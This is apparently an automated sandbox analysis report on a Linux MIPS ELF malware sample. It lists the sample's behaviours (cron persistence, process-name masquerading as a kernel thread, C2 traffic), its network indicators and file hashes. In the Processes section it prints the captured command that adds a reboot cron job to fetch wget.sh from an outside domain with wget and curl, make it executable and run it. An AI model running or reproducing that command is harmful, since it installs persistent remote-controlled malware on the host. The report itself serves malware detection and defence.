Analysis Overview
SHA256
b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
Threat Level: Shows suspicious behavior
The file b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:49
Reported
2024-10-27 02:51
Platform
debian9-mipsel-20240611-en
Max time kernel
142s
Max time network
139s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 168.235.111.72 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.DDLmqg | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/mounts | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A |
Processes
/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
[/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| US | 168.235.111.72:53 | kingstonwikkerink.dyn | udp |
| CZ | 195.133.92.51:24240 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.DDLmqg
| MD5 | 8c9ff02103c706a091467f66f463d116 |
| SHA1 | 8389f2e1cb1e2bb7034773f88119c45482870a46 |
| SHA256 | e001ff127ebf9d6ceed98f1c5b5326b833864a8473b0e072b64de7315ed8c6f4 |
| SHA512 | da6e9fa9b71115b07d4e4a561800b89732fc20031c955ad9aa11befda0c2567547aa324fb47ad3db536a9dfb93173352d3c3613124b13ae866ac44d77cf8e555 |